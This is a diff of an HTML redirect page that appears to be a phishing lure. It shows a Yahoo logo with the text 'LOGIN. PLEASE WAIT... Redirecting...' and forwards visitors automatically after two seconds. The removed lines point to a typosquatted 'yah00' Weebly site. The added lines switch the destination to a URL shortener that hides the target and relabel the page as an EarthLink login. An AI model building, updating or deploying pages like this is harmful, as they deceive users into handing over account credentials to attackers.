--- a/f-cw12.html
+++ b/f-cw12.html
@@ -2,11 +2,11 @@
 <html>
 <head>
 <title>Redirecting...</title>
-<meta http-equiv="refresh" content="2; url = https://yah00-line.weebly.com/" />
+<meta http-equiv="refresh" content="2; url = https://u.to/Kf1DIg" />
 </head>
-<P>YAHOO LOGIN
+<P>EARTHLINK LOGIN
 <body>
 <img src="https://s.yimg.com/rz/p/yahoo_homepage_en-US_s_f_p_bestfit_homepage.png">
-<p>YAHOO LOGIN. PLEASE WAIT... Redirecting...</p>
+<p>EARTHLINK LOGIN. PLEASE WAIT... Redirecting...</p>
 </body>
 </html>
